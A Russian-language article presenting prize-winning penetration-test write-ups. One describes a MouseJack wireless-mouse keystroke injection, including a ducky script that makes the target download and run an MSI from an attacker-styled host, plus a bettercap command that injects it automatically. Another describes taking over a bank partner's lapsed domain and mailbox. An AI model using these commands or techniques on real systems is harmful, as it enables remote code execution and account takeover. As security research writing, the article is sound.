Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
В августе 2023 года прошла церемония награждения Pentest Award — премии для специалистов по тестированию на проникновение. Мы опубликуем лучшие работы из каждой номинации и начнем с пробива периметра.
Компания Awillix учредила премию, чтобы этичные хакеры смогли громко заявить о себе и рассказать о своих достижениях. Для участия специалисты оставляли заявки с рассказом о своем лучшем проекте, где больше всего проявили смекалку, профессионализм и креатив.
В этой статье собраны райтапы, занявшие четвертое, третье и второе места в номинации «Пробив», а следом отдельной публикацией выйдет работа, взявшая первое место.
В 2020 году я участвовал в комплексном аудите беспроводных сетей на строгом режимном заводе. Мне удалось пробить периметр простым и оригинальным способом. Доступ к рабочему компьютеру сотрудника был получен прямо с улицы, по модели внешнего нарушителя и с использованием мобильного телефона.
На экране телефона можно видеть шелл, открытый на компьютере сотрудника, и приглашение во внутреннюю сеть завода. Этот кейс на 100% демонстрирует реальность атаки внешним нарушителем.
В основе атаки — уязвимость MouseJack, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек.
Для эксплуатации на подверженном ПК была набрана команда из следующего ducky-скетча:
GUI r
DELAY 300
STRING msiexec /i https://en.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER
DELAY 300
GUI SPACE
DELAY 300
GUI r
DELAY 300
STRING msiexec /i https://ru.mousejack.attacker.tk/1.msi /quiet
DELAY 300
ENTER
Эта команда работает на любой Windows, даже старой, имеет минимальную длину и за одно действие скачивает и запускает указанный исполняемый файл по HTTP.
Для реального пробива периметра потенциальному злоумышленнику требовалось лишь немного настроить телефон. Нужна автоматическая отправка вредоносных нажатий на каждую вновь найденную беспроводную мышку или клавиатуру. Это можно сделать такой командой:
sudo bettercap -eval "hid.recon on; events.on hid.device.new "hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;"" 2> /dev/null
Теперь атакующий может убрать телефон в карман и неприметно прогуливаться вдоль периметра, пока ему на виртуалку прилетают шеллы.
Позже аналогичным образом мы пробивали периметры очень крупных и известных ИТ‑компаний. И каждый раз это мог быть внешний нарушитель, ничем не выделяющийся из толпы.
Уязвимость работает по радиоканалу, а это накладывает некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно. Цели, находящиеся выше, можно атаковать с помощью дрона с прикрепленным к нему Raspberry Pi Zero и Crazyradio.
Эта уязвимость, найденная еще в 2016 году, по‑прежнему актуальна, так как имеет аппаратную природу. По моему мнению, это самая опасная из всех физических уязвимостей сегодня, поскольку она сразу же дает RCE на подверженных устройствах, эксплуатируется за секунду и несложна в эксплуатации.
Более подробно я писал о ней в статьях «Киберфон. Превращаем телефон на Android в инструмент хакера» и «Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок».
Это краткая история о пентесте, который мы проводили по заказу одного из крупных банков. Точкой входа стало мобильное приложение для бизнеса.
Мы заметили, что домен для почты в приложении не совпадает с тем, который указан на сайте. Он вел на адрес в зоне .com, тогда как сайт находится в зоне .ru.
На главной странице домена из российского сегмента видим такое сообщение:
Оно говорит нам о том, что домен направлен на сайт, созданный при помощи конструктора Tilda. Регистрируемся в «Тильде», покупаем самый дешевый тариф и привязываем этот домен к своему сайту.
Смотрим, где хостится почта. Пишем dig somesecret.com MX
и узнаём, что это Яндекс:
somesecret.com. 86400 IN MX 10 mx.yandex.net.
Теперь идем в Яндекс, говорим, что мы владелец домена, и подтверждаем владение через тег на главной странице.
В разделе «Контакты» нашлись предыдущие владельцы электронной почты.
Прежний владелец пытался восстановить пароль на сервисе intercom.io.
Таким образом мы обнаружили всех зарегистрированных пользователей и получили список компаний‑партнеров.
Дальше мы написали простой парсер сообщений, который искал чувствительные данные. Сложно было за что‑то зацепиться среди тысячи переписок. В одной из них нашлась почта, отличная от домена. Да, опять!
Домен уже другой и расположен в зоне .io.
Мы запустили брут поддоменов и нашли IP-адреса, которые ведут в облачные сервисы.
При переборе директорий на одном из найденных серверов мы нашли каталог /auth/
, отображающий форму входа в «1С:Предприятие».
Источник: xakep.ru